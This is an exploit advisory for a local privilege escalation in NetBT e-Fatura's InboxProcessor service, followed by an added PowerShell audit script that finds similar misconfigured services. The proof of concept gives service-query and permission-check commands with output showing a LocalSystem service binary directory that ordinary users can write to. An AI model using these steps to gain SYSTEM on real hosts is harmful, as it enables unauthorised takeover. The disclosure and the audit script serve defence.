NetBT e-Fatura - Privilege Escalation

EDB-ID: 52509
Author: seccops
Type: local
Platform: Multiple
Date: 2026-04-10


# Exploit Title: NetBT e-Fatura - Privilege Escalation
# Author: Seccops
# Discovery Date: 2025-10-03
# Vendor: https://net-bt.com.tr/e-fatura/
# Tested Version: 2024
# Tested on OS: Microsoft Windows Server 2019 DC
# Vulnerability Type: CWE-428 Unquoted Search Path or Element
# CVE: CVE-2025-14018

Note: Thanks to "Levent Sungu" for providing the testing environment.

====================
Description & Impact
====================
This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system. As the proof of concept below shows, the InboxProcessor service starts automatically and runs as LocalSystem, while its binary directory (C:\inetpub\wwwroot\InboxProcessor) grants read and write access to BUILTIN\Users, so the code that SYSTEM executes at service start lives in a directory every standard user can modify.

================
Proof of Concept
================

C:\Users\efatura>sc qc InboxProcessor
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: InboxProcessor
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : InboxProcessor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\inetpub\wwwroot\InboxProcessor
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
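An added audit check, not part of this advisory: the PowerShell script below generalizes the two manual checks above (sc qc and accesschk) across all auto-start LocalSystem services, flagging unquoted binary paths that contain spaces (CWE-428) and binary directories where BUILTIN\Users, Authenticated Users or Everyone hold write or delete rights. The principal list and the rights mask are my assumptions about what counts as a low-privileged writer.

```powershell
# Added audit script; not part of the original advisory. Run in an elevated
# PowerShell on the host being audited. Assumption: these principals represent
# low-privileged users, and Write/Delete on the binary's directory is what lets
# them replace the service binary (as accesschk showed for InboxProcessor).
$lowPrivPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
$dangerousRights = [System.Security.AccessControl.FileSystemRights]'Write, Delete'

function Get-ServiceExePath {
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }   # quoted: take the quoted part
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }  # unquoted: up to the first .exe
    return $PathName
}

function Find-RiskyServices {
    Get-CimInstance Win32_Service |
      Where-Object { $_.StartMode -eq 'Auto' -and $_.StartName -eq 'LocalSystem' -and $_.PathName } |
      ForEach-Object {
        $exe = Get-ServiceExePath $_.PathName
        # CWE-428: unquoted path whose executable portion contains a space
        $unquoted = ($_.PathName -notmatch '^"') -and ($exe -match ' ')
        $dir = Split-Path -Path $exe -Parent
        $writers = @()
        if ($dir -and (Test-Path -LiteralPath $dir)) {
            $acl = Get-Acl -LiteralPath $dir
            foreach ($rule in $acl.Access) {
                if ($rule.AccessControlType -eq 'Allow' -and
                    $lowPrivPrincipals -contains $rule.IdentityReference.Value -and
                    (([int]$rule.FileSystemRights) -band ([int]$dangerousRights)) -ne 0) {
                    $writers += $rule.IdentityReference.Value
                }
            }
        }
        if ($unquoted -or $writers.Count -gt 0) {
            [PSCustomObject]@{
                Service      = $_.Name
                RunsAs       = $_.StartName
                BinaryPath   = $_.PathName
                UnquotedPath = $unquoted
                WritableBy   = ($writers | Sort-Object -Unique) -join ', '
            }
        }
      }
}

# Remediation for each finding: quote the path in the service's ImagePath and
# remove the Write/Delete ACE for the low-privileged principal on the directory.
Find-RiskyServices | Format-Table -AutoSize
```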